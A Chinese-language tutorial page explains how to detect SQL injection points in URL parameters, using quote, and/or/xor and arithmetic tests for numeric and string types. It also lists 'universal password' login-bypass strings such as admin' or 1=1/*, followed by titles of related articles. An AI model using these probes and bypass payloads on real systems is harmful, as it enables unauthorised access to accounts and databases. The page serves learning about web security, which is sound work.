SQL注入点判断及万能密码
目录
SQL注入漏洞的类型
1.数字型判断
2.字符型判断
SQL注入--万能密码
SQL注入漏洞的类型
1.单引号判断
http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。
2.and判断
http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页
http://www.xxx.com/xxx.asp?id=10'and 1=2如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。
3.Or判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)
http://www.xxx.com/xxx.asp?id=10'or 1=1
http://www.xxx.com/xxx.asp?id=10'or 1=2
4.xor判断(xor后面的语句如果是正确的,则返回错误页面,如果是错误,则返回正确页面,说明存在注入点。)
http://www.xxx.com/xxx.asp?id=10'xor 1=1
http://www.xxx.com/xxx.asp?id=10'xor 1=2
5.加减号数字判断(返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.)
http://www.xxx.com/xxx.asp?id=10-0
http://www.xxx.com/xxx.asp?id=10-1
http://www.xxx.com/xxx.asp?id=10+1
and,or,xor等判断可以参考这三种逻辑运算的规律进行理解
sql注入漏洞通常为2种
- 数字型
- 字符型
1.数字型判断
当输入的参 x 为整型时,通常 abc.php 中 Sql 语句类型大致如下:select * from <表名> where id = x这种类型可以使用经典的 and 1=1 和 and 1=2 来判断:
- Url 地址中输入
http://xxx/abc.php?id= x and 1=1页面依旧运行正常,继续进行下一步。 - Url 地址中继续输入
http://xxx/abc.php?id= x and 1=2页面运行错误,则说明此 Sql 注入为数字型注入。
我们输入的是 x and 1=1 和x and 1=2
语句就是这样:
select* from …… where id=x and 1=1
select* from …… where id=x and 1=2
and左边的x是返回成功的,因为如果不存在后面也没法进行,而1=1是成立的,所以页面运行正常。如果是1=2,不成立,同时and语句的判断逻辑是只要有一个不成立,就返回失败,所以运行错误。
2.字符型判断
当输入的参 x 为字符型时,通常 abc.php 中 SQL 语句类型大致如下:select * from <表名> where id = 'x'这种类型我们同样可以使用 and ‘1’='1 和 and ‘1’='2来判断。
这里就使上面的数字型变为了字符型
而语句则是
select * from <表名> where id = 'x' and ‘1’='1'
这时候sql已经闭合了
还是一样的,这里and的左边是一定成立的,而and右边也是一样的成立,所以and逻辑之后,整个语句返回成功
同理可知如果后面是1'='2就会返回失败,而且这里不一定非要是1或者2,因为是字符型,所以我们可以输入任何字符,如a'='a,a'='b
SQL注入--万能密码
万能密码类似形式
“or"a”="a
')or(‘a’='a
")or(“a”="a
‘or 1=1–
“or 1=1–
'or”=’
'or 1=1%00
'or 1=1/
admin’ or 1=1/*SQL注入点判断及万能密码相关推荐
- SQL注入闭合方式及万能密码
由万能公式想到的... 请求方式 GET请求 POST请求 SQL注入闭合方式 数字型 字符型 再看sqli-labs实验 万能密码 请求方式 两种 HTTP 请求方法:GET 和 POST 在客户机 ...
- SQL注入基础--判断闭合形式
这里写自定义目录标题 ** **SQL注入基础--判断闭合形式** ## 1.整形闭合 2.单引号闭合 3.双引号闭合 总结 ** SQL注入基础–判断闭合形式 SQL语句的闭合形式大概如下几种: S ...
- sql注入mysql判断_sql注入笔记二——数据库信息判断
3.1常见的sql注入利用技术 3.1.1使用堆叠查询 堆叠查询指的是在单个数据库连接中执行多个查询. 3.2识别数据库 3.2.1 常见系统架构组合识别 Asp和.net通常使用sqlserver ...
- SQL注入原理及绕过技术
目录 sql注入产生的原因 万能密码介绍 sql注入验证 mysql 5.x数据库介绍 sql数据库增删改查 Mysql常用的聚合函数 mysql注释 SQL注入的分类 报错注入 盲注注入 user- ...
- Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
VulnOSv2 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web思路 步骤一:枚举目录+主页挖掘 步骤二:OpenDocMan v1.2.7 cms利用 步骤三: ...
- 通过SQL注入拿到管理员密码
该靶场来自于(封神台封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台. 首先我们看下题目 题目是通过SQL注入拿到管理员后台密码 我们先点开"传送门"打开靶场 靶场已经 ...
- CTFshow sql注入 上篇(web171-220)
目录 前言 题目 web 171(万能密码) web 172(回显内容过滤,base64或者hex编码绕过) web 173(回显内容过滤,base64或者hex编码绕过) web 174 (布尔盲注 ...
- SQL注入-入门需了解项目
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 什么是SQL? 一.SQL注入 1.什么是SQL注入 2.SQL注入漏洞的原理是什么? 3.SQL注入漏洞产生的基本前提 4 ...
- SQL注入漏洞-SQL注入原理与实践
什么是SQL注入?:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意的)SQL ...
最新文章
- 技术干货 | iOS 高阶容器详解
- 01-java基础加强,eclipse工具使用,快捷键,断点调试,单元测试,jdk5新特性,增强for循环,集合map,list,可变参数,枚举,反射,泛型
- 分布式会话拦截器2 - 会话判断
- ReactiveCocoa基础
- 《C语言从入门到精通》pdf
- 计算机导航医学应用,计算机导航技术在口腔颌面外科应用中的新发展
- 互联网服务器使用ipset 和iptables禁止国外IP访问
- 101—200之间的素数-Java编写
- rust卡在服务器列表不显示,rust服务器废料设置
- 腾讯微博qq说说备份导出工具_电竞和游戏火了,和它走得很近的腾讯微博却早已透心凉...
- ElasticSearch(ik分词器)+SpringBoot站内全文搜索解决方案
- linux下gpt分区,Linux下的GPT分区
- 什么是LOST.DIR?
- Excel与Google Sheets中实现线性规划求解
- linux 内核printk 打印信息查询方法
- ubuntu 软件管理
- 十大黑客电影-关于程序员或者关于电脑高手的电影
- 区块链论语:付币看真相是一个应用
- 苹果手机heic格式照片怎么转成jpg
- 2020年Redis系列面试题详解